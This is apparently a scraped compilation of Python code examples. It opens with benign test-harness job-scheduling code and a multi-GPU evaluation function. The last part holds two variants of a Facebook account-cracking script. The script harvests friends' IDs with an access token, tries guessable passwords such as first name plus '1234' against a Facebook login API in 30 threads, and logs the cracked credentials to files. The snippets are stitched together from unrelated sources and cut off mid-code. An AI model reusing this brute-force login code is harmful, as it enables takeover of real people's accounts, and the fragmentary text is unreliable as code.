            if self.slots_in_use + job.getSlots() <= self.available_slots:
                can_run = True

            # Check for insufficient slots -soft limit
            elif job.getSlots() > self.available_slots and self.soft_limit:
                job.addCaveats('OVERSIZED')
                can_run = True

            # Check for insufficient slots -hard limit (skip this job)
            elif job.getSlots() > self.available_slots and not self.soft_limit:
                job.addCaveats('insufficient slots')
                with j_lock:
                    job.setStatus(job.skip)

            if can_run:
                self.slots_in_use += job.getSlots()
        return can_run

    def handleTimeoutJob(self, job, j_lock):
        """ Handle jobs that have timed out """
        with j_lock:
            if job.isRunning():
                job.setStatus(job.crash, 'TIMEOUT')
                job.killProcess()

    def handleLongRunningJob(self, job, Jobs, j_lock):
        """ Handle jobs that have not reported in the alotted time """
        with self.__status_pool_lock:
            self.__status_pool_jobs.add(self.status_pool.apply_async(self.jobStatus, (job, Jobs, j_lock)))

    def jobStatus(self, job, Jobs, j_lock):
        """
        Instruct the TestHarness to print the status of job. This is a serial
        threaded operation, so as to prevent clobbering of text being printed
        to stdout.
        """
        if self.status_pool._state:
            return

        # Its possible, the queue is just trying to empty
        try:
            job_was_running = False
            # Check if we should print due to inactivity
            with j_lock:
                if job.isRunning():
                    if job in self.jobs_reported:
                        return

                    # report inactivity if last reported time falls within tolerances
                    elif clock() - self.last_reported_time >= self.min_report_time:
                        job_was_running = True
                        job.addCaveats('FINISHED')

                        with self.activity_lock:
                            self.jobs_reported.add(job)

                    # TestHarness has not yet been inactive long enough to warrant a report
                    else:
                        # adjust the next report time based on delta of last report time
                        adjusted_interval = max(1, self.min_report_time - max(1, clock() - self.last_reported_time))
                        job.report_timer = threading.Timer(adjusted_interval,
                                                           self.handleLongRunningJob,
                                                           (job, Jobs, j_lock,))
                        job.report_timer.start()
                        return

            # Immediately following the Job lock, print the status
            self.harness.handleJobStatus(job)

            # Do last, to prevent premature thread pool closures
            with j_lock:
                tester = job.getTester()

                if not tester.isSilent():
                    self.last_reported_time = clock()

                if job.isFinished() and not job_was_running:
                    if tester.isFail():
                        self.__failures += 1

                    if self.maxFailures():
                        self.killRemaining()
                    else:
                        with self.job_count_lock:
                            self.job_count -= 1

        except Exception:
            print('statusWorker Exception: %s' % (traceback.format_exc()))
            self.killRemaining()

        except KeyboardInterrupt:
            self.killRemaining(keyboard=True)

    def runJob(self, job, Jobs, j_lock):
        """ Method the run_pool calls when an available thread becomes ready """
        # Its possible, the queue is just trying to empty. Allow it to do so
        # with out generating overhead
        if self.__error_state:
            return

        try:
            # see if we have enough slots to start this job
            if self.reserveSlots(job, j_lock):
                with j_lock:
                    job.setStatus(job.running)

                with self.activity_lock:
                    self.__active_jobs.add(job)

                tester = job.getTester()
                timeout_timer = threading.Timer(float(tester.getMaxTime()),
                                                self.handleTimeoutJob,
                                                (job, j_lock,))

                job.report_timer = threading.Timer(self.min_report_time,
                                                   self.handleLongRunningJob,
                                                   (job, Jobs, j_lock,))

                job.report_timer.start()
                timeout_timer.start()
                self.run(job) # Hand execution over to derived scheduler
                timeout_timer.cancel()

                # Recover worker count before attempting to queue more jobs
                with self.slot_lock:
                    self.slots_in_use = max(0, self.slots_in_use - job.getSlots())

                # Stop the long running timer
                job.report_timer.cancel()

                # All done
                with j_lock:
                    job.setStatus(job.finished)

                with self.activity_lock:
                    self.__active_jobs.remove(job)

            # Not enough slots to run the job...
            else:
                # ...currently, place back on hold before placing it back into the queue
                if not job.isFinished():
                    with j_lock:
                        job.setStatus(job.hold)
                    sleep(.1)

            # Job is done (or needs to re-enter the queue)
            self.queueJobs(Jobs, j_lock)

        except Exception:
            print('runWorker Exception: %s' % (traceback.format_exc()))
            self.killRemaining()

        except KeyboardInterrupt:
            self.killRemaining(keyboard=True)
Exemple #45
0
class Scheduler(MooseObject):
    """
    Base class for handling jobs asynchronously. To use this class, call .schedule()
    and supply a list of testers to schedule. Each group of testers supplied will begin
    running immediately.

    Syntax:
       .schedule([list of tester objects])

    A list of testers will be added to a queue and begin calling their derived run method.
    You can continue to add more testers to the queue in this fashion.

    Once you schedule all the testers you wish to test, call .waitFinish() to wait until
    all testers have finished.

    """

    @staticmethod
    def validParams():
        params = MooseObject.validParams()
        params.addRequiredParam('average_load',  64.0, "Average load to allow")
        params.addRequiredParam('max_processes', None, "Hard limit of maxium processes to use")

        return params

    def __init__(self, harness, params):
        MooseObject.__init__(self, harness, params)

        ## The test harness to run callbacks on
        self.harness = harness

        # Retrieve and store the TestHarness options for use in this object
        self.options = harness.getOptions()

        # The Scheduler class can be initialized with no "max_processes" argument and it'll default
        # to a soft limit. If however a max_processes is passed we'll treat it as a hard limit.
        # The difference is whether or not we allow single jobs to exceed the number of slots.
        if params['max_processes'] == None:
            self.available_slots = 1
            self.soft_limit = True
        else:
            self.available_slots = params['max_processes'] # hard limit
            self.soft_limit = False

        # Requested average load level to stay below
        self.average_load = params['average_load']

        # The time the status queue reported no activity to the TestHarness
        self.last_reported = clock()

        # A set containing jobs that have been reported
        self.jobs_reported = set([])

        # Initialize run_pool based on available slots
        self.run_pool = ThreadPool(processes=self.available_slots)

        # Initialize status_pool to only use 1 process (to prevent status messages from getting clobbered)
        self.status_pool = ThreadPool(processes=1)

        # Slot Lock when processing resource allocations
        self.slot_lock = threading.Lock()

        # DAG Lock when processing the DAG
        self.dag_lock = threading.Lock()

        # Workers in use (single job might request multiple slots)
        self.slots_in_use = 0

        # Jobs waiting to finish (includes actively running jobs)
        self.job_queue_count = 0

        # Set containing our TesterData containers. We use this in the event of a KeyboardInterrupt to
        # iterate over and kill any subprocesses
        self.tester_datas = set([])

    def killRemaining(self):
        """
        Method to kill any running subprocess started by the Scheduler. This also
        closes the status pool to prevent further statuses from printing to the
        screen.
        """
        self.run_pool.close()
        self.status_pool.close()

        for tester_data in self.tester_datas:
            tester_data.killProcess()
        self.job_queue_count = 0

    def run(self, job_container):
        """ Call derived run method """
        return

    def skipPrereqs(self):
        """
        Method to return boolean to skip dependency prerequisites checks.
        """
        if self.options.ignored_caveats:
            if 'all' in self.options.ignored_caveats or 'prereq' in self.options.ignored_caveats:
                return True
        return False

    def processDownstreamTests(self, job_container):
        """
        Method to discover and delete downstream jobs due to supplied job failing.
        """
        with self.dag_lock:
            failed_job_containers = set([])
            tester = job_container.getTester()
            job_dag = job_container.getDAG()
            if (tester.isFinished() and not tester.didPass() and not tester.isSilent() and not self.skipPrereqs()) \
                or (self.options.dry_run and not tester.isSilent()):

                # Ask the DAG to delete and return the downstream jobs associated with this job
                failed_job_containers.update(job_dag.delete_downstreams(job_container))

            for failed_job in failed_job_containers:
                tester = failed_job.getTester()
                tester.setStatus('skipped dependency', tester.bucket_skip)

        return failed_job_containers

    def buildDAG(self, job_container_dict, job_dag):
        """
        Build the DAG and catch any failures.
        """

        failed_or_skipped_testers = set([])

        # Create DAG independent nodes
        for tester_name, job_container in job_container_dict.iteritems():
            tester = job_container.getTester()

            # If this tester is not runnable, continue to the next tester
            if tester.getRunnable(self.options):

                job_dag.add_node_if_not_exists(job_container)

            else:
                failed_or_skipped_testers.add(tester)
                continue

        # Create edge nodes
        for tester_name, job_container in job_container_dict.iteritems():
            tester = job_container.getTester()

            # Add the prereq node and edges
            for prereq in tester.getPrereqs():

                try:
                    # Try to produce a KeyError and capture an unknown dependency
                    job_container_dict[prereq]

                    # Try to produce either a cyclic or skipped dependency error using the DAG's
                    # built-in exception methods
                    job_dag.add_edge(job_container_dict[prereq], job_container)

                # Skipped Dependencies
                except dag.DAGEdgeIndError:
                    if not self.skipPrereqs():
                        tester.setStatus('skipped dependency', tester.bucket_skip)
                        failed_or_skipped_testers.add(tester)

                    # Add the parent node / dependency edge to create a functional DAG now that we have caught
                    # the skipped dependency (needed for discovering race conditions later on)
                    job_dag.add_node_if_not_exists(job_container_dict[prereq])
                    job_dag.add_edge(job_container_dict[prereq], job_container)

                # Cyclic Failure
                except dag.DAGValidationError:
                    tester.setStatus('Cyclic or Invalid Dependency Detected!', tester.bucket_fail)
                    failed_or_skipped_testers.add(tester)

                # Unknown Dependency Failure
                except KeyError:
                    tester.setStatus('unknown dependency', tester.bucket_fail)
                    failed_or_skipped_testers.add(tester)

                # Skipped/Silent/Deleted Testers fall into this catagory, caused by 'job_container' being skipped
                # during the first iteration above
                except dag.DAGEdgeDepError:
                    pass

        # With a working DAG created above (even a partial one), discover race conditions with remaining runnable
        # testers.
        failed_or_skipped_testers.update(self.checkRaceConditions(job_dag))

        return failed_or_skipped_testers

    def checkRaceConditions(self, dag_object):
        """
        Return a set of failing testers exhibiting race conditions with their
        output file.
        """
        failed_or_skipped_testers = set([])

        # clone the dag so we can operate destructively on the cloned dag
        dag_clone = dag_object.clone()

        while dag_clone.size():
            output_files_in_dir = set()

            # Get a list of concurrent job containers
            concurrent_jobs = dag_clone.ind_nodes()

            for job_container in concurrent_jobs:
                tester = job_container.getTester()
                output_files = tester.getOutputFiles()

                # check if we have colliding output files
                if len(output_files_in_dir.intersection(set(output_files))):

                    # Fail this concurrent group of testers
                    for this_job in concurrent_jobs:
                        tester = this_job.getTester()
                        tester.setStatus('OUTFILE RACE CONDITION', tester.bucket_fail)
                        failed_or_skipped_testers.add(tester)

                    # collisions detected, move on to the next set
                    break

                output_files_in_dir.update(output_files)

            # Delete this group of job containers and allow the loop to continue
            for job_container in concurrent_jobs:
                dag_clone.delete_node(job_container)

        return failed_or_skipped_testers

    def schedule(self, testers):
        """
        Schedule supplied list of testers for execution.
        """
        # If any threads caused an exception, we have already closed down the queue and need to
        # not schedule any more jobs
        if self.run_pool._state:
            return

        # Instance the DAG class so we can share it amongst all the TesterData containers
        job_dag = dag.DAG()

        non_runnable_jobs = set([])
        name_to_job_container = {}

        # Increment our simple queue count with the number of testers the scheduler received
        with self.slot_lock:
            self.job_queue_count += len(testers)

        # Create a local dictionary of tester names to job containers. Add this dictionary to a
        # set. We will use this set as a way to gain access to their methods.
        for tester in testers:
            name_to_job_container[tester.getTestName()] = TesterData(tester, job_dag, self.options)
            self.tester_datas.add(name_to_job_container[tester.getTestName()])

        # Populate job_dag with testers. This method will also return any testers which caused failures
        # while building the DAG.
        skipped_or_failed_testers = self.buildDAG(name_to_job_container, job_dag)

        # Create a set of failing job containers
        for failed_tester in skipped_or_failed_testers:
            non_runnable_jobs.add(name_to_job_container[failed_tester.getTestName()])

        # Iterate over the jobs in our non_runnable_jobs and handle any downstream jobs affected by
        # 'job'. These will be our 'skipped dependency' tests.
        for job in non_runnable_jobs.copy():
            additionally_skipped = self.processDownstreamTests(job)
            non_runnable_jobs.update(additionally_skipped)
            job_dag.delete_node_if_exists(job)

        # Get a count of all the items still in the DAG. These will be the jobs that ultimately are queued
        runnable_jobs = job_dag.size()

        # Make sure we didn't drop a tester somehow
        if len(non_runnable_jobs) + runnable_jobs != len(testers):
            raise SchedulerError('Runnable tests in addition to Skipped tests does not match total scheduled test count!')

        # Assign a status thread to begin work on any skipped/failed jobs
        self.queueJobs(status_jobs=non_runnable_jobs)

        # Build our list of runnable jobs and set the tester's status to queued
        job_list = []
        if runnable_jobs:
            job_list = job_dag.ind_nodes()
            for job_container in job_list:
                tester = job_container.getTester()
                tester.setStatus('QUEUED', tester.bucket_pending)

        # Queue runnable jobs
        self.queueJobs(run_jobs=job_list)

    def waitFinish(self):
        """
        Block while the job queue is not empty. Once empty, this method will begin closing down
        the thread pools and perform a join. Once the last thread exits, we return from this
        method.

        There are two thread pools in play; the Tester pool which is performing all the tests,
        and the Status pool which is handling the printing of tester statuses. Because the
        Status pool will always have the last item needing to be 'printed', we close and join
        the Tester pool first, and then we do the same to the Status pool.
        """
        while self.job_queue_count > 0:
            sleep(0.5)

        self.run_pool.close()
        self.run_pool.join()
        self.status_pool.close()
        self.status_pool.join()

    def handleLongRunningJobs(self, job_container):
        """ Handle jobs that have not reported in alotted time """
        if job_container not in self.jobs_reported:
            tester = job_container.getTester()
            tester.setStatus('RUNNING...', tester.bucket_pending)
            self.queueJobs(status_jobs=[job_container])

            # Restart the reporting timer for this job
            job_container.report_timer = threading.Timer(float(tester.getMinReportTime()),
                                                         self.handleLongRunningJobs,
                                                         (job_container,))

            job_container.report_timer.start()

    def handleTimeoutJobs(self, job_container):
        """ Handle jobs that have timed out """
        tester = job_container.getTester()
        tester.setStatus('TIMEOUT', tester.bucket_fail)
        job_container.killProcess()

    def getLoad(self):
        """ Method to return current load average """
        loadAverage = 0.0
        try:
            loadAverage = os.getloadavg()[0]
        except AttributeError:
            pass      # getloadavg() not available in this implementation of os
        return loadAverage

    def satisfyLoad(self):
        """ Method for controlling load average """
        while self.slots_in_use > 1 and self.getLoad() >= self.average_load:
            sleep(1.0)

    def reserveSlots(self, job_container):
        """
        Method which allocates resources to perform the job. Returns bool if job
        should be allowed to run.
        """
        tester = job_container.getTester()

        # comply with load average
        if self.options.load:
            self.satisfyLoad()

        with self.slot_lock:
            can_run = False
            if self.slots_in_use + tester.getProcs(self.options) <= self.available_slots:
                can_run = True

            # Check for insufficient slots -soft limit
            # TODO: Create a unit test for this case
            elif tester.getProcs(self.options) > self.available_slots and self.soft_limit:
                tester.specs.addParam('caveats', ['OVERSIZED'], "")
                can_run = True

            # Check for insufficient slots -hard limit (skip this job)
            # TODO: Create a unit test for this case
            elif tester.getProcs(self.options) > self.available_slots and not self.soft_limit:
                tester.setStatus('insufficient slots', tester.bucket_skip)
                can_run = False

            if can_run:
                self.slots_in_use += tester.getProcs(self.options)

        return can_run

    def getNextJobGroup(self, job_container):
        """
        Method to delete current finished job from the DAG and return the next
        list of individually runnable jobs.
        """
        with self.dag_lock:
            job_dag = job_container.getDAG()
            next_job_list = []

            # Delete this job from the shared DAG
            job_dag.delete_node(job_container)

            # Get next available job list
            concurrent_jobs = job_dag.ind_nodes()

            for next_job_container in concurrent_jobs:
                queued_tester = next_job_container.getTester()

                # Verify this job is not already running/pending/skipped
                if queued_tester.isInitialized():
                    # Set this next new job to pending so as to prevent this job from being launched a second time
                    queued_tester.setStatus('QUEUED', queued_tester.bucket_pending)
                    next_job_list.append(next_job_container)

        return next_job_list

    def queueJobs(self, status_jobs=[], run_jobs=[]):
        """
        Method to control which thread pool jobs enter.
        Syntax:

           To have a job(s) display its current status to the screen:
           .queueJobs(status_jobs=[job_container_list]

           To begin running job(s):
           .queueJobs(run_jobs=[job_container_list]

        """
        for job_container in run_jobs:
            if not self.run_pool._state:
                self.run_pool.apply_async(self.runWorker, (job_container,))

        for job_container in status_jobs:
            if not self.status_pool._state:
                self.status_pool.apply_async(self.statusWorker, (job_container,))

    def statusWorker(self, job_container):
        """ Method the status_pool calls when an available thread becomes ready """
        # Wrap entire statusWorker thread inside a try/exception to catch thread errors
        try:
            tester = job_container.getTester()

            # If the job is still running for a long period of time and we have not reported
            # this same job alread, report it now.
            if tester.isPending():
                if clock() - self.last_reported >= float(tester.getMinReportTime()) and job_container not in self.jobs_reported:
                    # Inform the TestHarness of a long running test (RUNNING...)
                    self.harness.handleTestStatus(job_container)

                    # ...And then set the finished caveat now that the running status has printed
                    tester.specs.addParam('caveats', ['FINISHED'], "")

                    # Add this job to the reported container so it does not happen again
                    self.jobs_reported.add(job_container)

                # Job is 'Pending', but is under the threshold to be reported (return now so
                # last_reported time does not get updated). This will ensure that if nothing
                # has happened between 'now' and another occurrence of our thread timer event
                # we do report it.
                else:
                    return

            else:
                # All other statuses are sent unmolested
                self.harness.handleTestStatus(job_container)

            # Decrement the job queue count now that this job has finished
            if tester.isFinished():
                with self.slot_lock:
                    self.job_queue_count -= 1

            # Record current reported time only if it is an activity the user will see
            if not tester.isSilent() or not tester.isDeleted():
                self.last_reported = clock()

        except Exception as e:
            print 'statusWorker Exception: %s' % (e)
            self.killRemaining()

    def runWorker(self, job_container):
        """ Method the run_pool calls when an available thread becomes ready """
        # Wrap the entire runWorker thread inside a try/exception to catch thread errors
        try:
            tester = job_container.getTester()
            # Check if there are enough resources to run this job
            if self.reserveSlots(job_container):

                # Start long running timer
                job_container.report_timer = threading.Timer(float(tester.getMinReportTime()),
                                                             self.handleLongRunningJobs,
                                                             (job_container,))
                job_container.report_timer.start()

                # Start timeout timer
                timeout_timer = threading.Timer(float(tester.getMaxTime()),
                                          self.handleTimeoutJobs,
                                          (job_container,))
                timeout_timer.start()

                # Call the derived run method
                self.run(job_container)

                # Stop timers now that the job has finished on its own
                job_container.report_timer.cancel()
                timeout_timer.cancel()

                # Derived run needs to set a non-pending status of some sort.
                if tester.isPending():
                    raise SchedulerError('Derived Scheduler can not return a pending status!')

                # Determin if this job creates any skipped dependencies (if it failed), and send
                # this new list of jobs to the status queue to be printed.
                possibly_skipped_job_containers = self.processDownstreamTests(job_container)
                possibly_skipped_job_containers.add(job_container)
                self.queueJobs(status_jobs=possibly_skipped_job_containers)

                # Get next job list
                next_job_group = self.getNextJobGroup(job_container)

                # Recover worker count before attempting to queue more jobs
                with self.slot_lock:
                    self.slots_in_use = max(0, self.slots_in_use - tester.getProcs(self.options))

                # Queue this new batch of runnable jobs
                self.queueJobs(run_jobs=next_job_group)

            # Not enough slots to run the job, currently
            else:
                # There will never be enough slots to run this job (insufficient slots)
                if tester.isFinished():
                    failed_downstream = self.processDownstreamTests(job_container)
                    failed_downstream.add(job_container)
                    self.queueJobs(status_jobs=failed_downstream)

                # There are no available slots, currently. Place back in queue, and sleep for a bit
                else:
                    self.queueJobs(run_jobs=[job_container])
                    sleep(0.3)

        except Exception as e:
            print 'runWorker Exception: %s' % (e)
            self.killRemaining()
Exemple #46
0
def pred_eval_multiprocess(gpu_num,
                           key_predictors,
                           cur_predictors,
                           test_datas,
                           imdb,
                           cfg,
                           vis=False,
                           thresh=1e-3,
                           logger=None,
                           ignore_cache=True):

    if cfg.TEST.SEQ_NMS == False:
        if gpu_num == 1:
            res = [
                pred_eval(0, key_predictors[0], cur_predictors[0],
                          test_datas[0], imdb, cfg, vis, thresh, logger,
                          ignore_cache),
            ]
        else:
            from multiprocessing.pool import ThreadPool as Pool
            pool = Pool(processes=gpu_num)
            multiple_results = [
                pool.apply_async(pred_eval,
                                 args=(i, key_predictors[i], cur_predictors[i],
                                       test_datas[i], imdb, cfg, vis, thresh,
                                       logger, ignore_cache))
                for i in range(gpu_num)
            ]
            pool.close()
            pool.join()
            res = [res.get() for res in multiple_results]
        info_str = imdb.evaluate_detections_multiprocess(res)

    else:
        if gpu_num == 1:
            res = [
                pred_eval(0, key_predictors[0], cur_predictors[0],
                          test_datas[0], imdb, cfg, vis, thresh, logger,
                          ignore_cache),
            ]

        else:
            from multiprocessing.pool import ThreadPool as Pool

            pool = Pool(processes=gpu_num)
            multiple_results = [
                pool.apply_async(pred_eval,
                                 args=(i, key_predictors[i], cur_predictors[i],
                                       test_datas[i], imdb, cfg, vis, thresh,
                                       logger, ignore_cache))
                for i in range(gpu_num)
            ]
            pool.close()
            pool.join()
            res = [res.get() for res in multiple_results]

        from multiprocessing import Pool as Pool
        pool = Pool(processes=gpu_num)
        jobs = []
        res = []
        for i in range(gpu_num):
            job = apply_async(pool, pred_eval_seqnms, (i, imdb))
            jobs.append(job)
        for job in jobs:
            res.append(job.get())
        info_str = imdb.do_python_eval_gen(gpu_num)
    if logger:
        logger.info('evaluate detections: \n{}'.format(info_str))
Exemple #47
0
def pilih_super():
	peak = raw_input("\n\033[1;97mChoose an Option>>> \033[1;97m")
	if peak =="":
		print "\x1b[1;91mFill in correctly"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print logo
		print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn-rixo\033[1;95m♡──────────•◈•──────────♡"
		jalan('\033[1;93mGetting IDs \033[1;97m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif peak =="2":
		os.system('clear')
		print logo
		idt = raw_input("\033[1;96m[♡] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
		print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn-rixo\033[1;95m♡──────────•◈•──────────╯♡"
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;93mName\033[1;93m:\033[1;97m "+op["name"]
		except KeyError:
			print"\x1b[1;92mID Not Found!"
			raw_input("\n\033[1;96m[\033[1;94mBack\033[1;96m]")
			super()
		print"\033[1;93mGetting IDs\033[1;93m..."
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="0":
		menu()
	else:
		print "\x1b[1;91mFill in correctly"
		pilih_super()
	
	print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m"+str(len(id))
	jalan('\033[1;92mPlease Wait\033[1;93m...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;91mHacking\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
	print "\n\033[1;94m«-----\x1b[1;93m♡To Stop Process Press CTRL+Z♡\033[1;94m----»"
	print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn.rixo\033[1;95m♡──────────•◈•──────────♡"
	
			
	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass #Dev:love_hack
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = ('786786')
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92mlogin\x1b[1;97m \x1b[1;92m✧\x1b[1;97m|' + user + '| \x1b[1;94m✧\x1b[1;97m-' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '\x1b[1;95mCheck\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass1
					cek = open("out/checkpoint.txt", "a")
					cek.write(user+"|"+pass1+"\n")
					cek.close()
					cekpoint.append(user+pass1)
				else:
					pass2 = 'Pakistan'
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92mlogin\x1b[1;97m \x1b[1;94m✧\x1b[1;97m|' + user + '| \x1b[1;94m✧\x1b[1;97m-' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '\x1b[1;95mCheck\x1b[1;97m-\x1b[1;94m✧\x1b[1;97m-' + user + '-\x1b[1;94m✧\x1b[1;97m-' + pass2
							cek = open("out/checkpoint.txt", "a")
							cek.write(user+"|"+pass2+"\n")
							cek.close()
							cekpoint.append(user+pass2)
						
																	
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print "\033[1;95m♡──────────•◈•──────────♡\033[1;96mXpartxn-rixo\033[1;95m♡──────────•◈•──────────♡"
	print "  \033[1;93m«---•◈•---Developed By Rixo---•◈•---»" #Dev:love_hack
	print '\033[1;91mProcess Has Been Completed\033[1;92m....'
	print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
	print """
             
             "Gullyboy;
def pilih_super():
    peak = raw_input("\n\033[1;91m^.^Choose an Option>>> \033[1;95m")
    if peak == "":
        print "\x1b[1;91mFill in correctly"
        pilih_super()
    elif peak == "1":
        os.system('clear')
        print logo
        print "\033[1;97m•◈•══════•◈•\033[1;91mKausar💋\033[1;97m•◈•══════•◈•"

        r = requests.get(
            "https://graph.facebook.com/me/friends?access_token=" + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])
    elif peak == "2":
        os.system('clear')
        print logo
        idt = raw_input(
            "\033[1;95m[•◈•] \033[1;91mEnter ID\033[1;95m: \033[1;95m")
        print "\033[1;92m•◈•══════••◈•\033[1;91mMdKausar\033[1;95m•◈•══════••◈•"
        try:
            jok = requests.get("https://graph.facebook.com/" + idt +
                               "?access_token=" + toket)
            op = json.loads(jok.text)
            print "\033[1;91mName\033[1;95m:\033[1;95m " + op["name"]
        except KeyError:
            print "\x1b[1;91mID Not Found!"
            raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
            super()
        print "\033[1;91mGetting IDs\033[1;97m..."
        r = requests.get("https://graph.facebook.com/" + idt +
                         "/friends?access_token=" + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])
    elif peak == "0":
        menu()
    else:
        print "\x1b[1;91mFill in correctly"
        pilih_super()

    print "\033[1;36;40m[✺] Total IDs : \033[1;94m" + str(len(id))
    jalan('\033[1;34;40m[✺] Please Wait...')
    titik = ['.   ', '..  ', '... ']
    for o in titik:
        print("\r\033[1;32;40m[✺] Cloning\033[1;93m" + o),
        sys.stdout.flush()
        time.sleep(1)
    print "\n\033[1;94m        ❈     \x1b[1;91mTo Stop Process Press CTRL+Z \033[1;94m    ❈"
    print "   \033[1;92m●══════════════════◄►══════════════════●"

    jalan('           \033[1;91m MD Kausar Islam    Hacking Wait...')
    print "  \033[1;92m ●══════════════════◄►══════════════════●"

    def main(arg):
        global cekpoint, oks
        user = arg
        try:
            os.mkdir('out')
        except OSError:
            pass  #Dev:Kausar
        try:
            a = requests.get('https://graph.facebook.com/' + user +
                             '/?access_token=' + toket)
            b = json.loads(a.text)
            pass1 = b['first_name'] + '1234'
            data = urllib.urlopen(
                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
            )
            q = json.load(data)
            if 'access_token' in q:
                x = requests.get("https://graph.facebook.com/" + user +
                                 "?access_token=" + q['access_token'])
                z = json.loads(x.text)
                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                    'name']
                print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass1 + '\n'
                oks.append(user + pass1)
            else:
                if 'www.facebook.com' in q["error_msg"]:
                    print '\x1b[1;94m[ ❥ ] \x1b[1;94mHack100%💉'
                    print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                        'name']
                    print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                    print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass1 + '\n'
                    cek = open("out/super_cp.txt", "a")
                    cek.write("ID:" + user + " Pw:" + pass1 + "\n")
                    cek.close()
                    cekpoint.append(user + pass1)
                else:
                    pass2 = b['first_name'] + '123'
                    data = urllib.urlopen(
                        "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                        + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                    )
                    q = json.load(data)
                    if 'access_token' in q:
                        x = requests.get("https://graph.facebook.com/" + user +
                                         "?access_token=" + q['access_token'])
                        z = json.loads(x.text)
                        print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                        print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
                            'name']
                        print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m      ✯ \x1b[1;92m' + user
                        print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass2 + '\n'
                        oks.append(user + pass2)
                    else:
                        if 'www.facebook.com' in q["error_msg"]:
                            print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
                            print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m    ✯ \x1b[1;95m' + b[
                                'name']
                            print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m      ✯ \x1b[1;95m' + user
                            print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass2 + '\n'
                            cek = open("out/super_cp.txt", "a")
                            cek.write("ID:" + user + " Pw:" + pass2 + "\n")
                            cek.close()
                            cekpoint.append(user + pass2)
                        else:
                            pass3 = b['last_name'] + '123'
                            data = urllib.urlopen(
                                "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="
                                + (user) + "&locale=en_US&password="******"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
                            )
                            q = json.load(data)
                            if 'access_token' in q:
                                x = requests.get(
                                    "https://graph.facebook.com/" + user +
                                    "?access_token=" + q['access_token'])
                                z = json.loads(x.text)
                                print '\x1b[1;94m[  ✓  ] \x1b[1;92mHack100%💉'
                                print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m    ✯ \x1b[1;92m' + b[
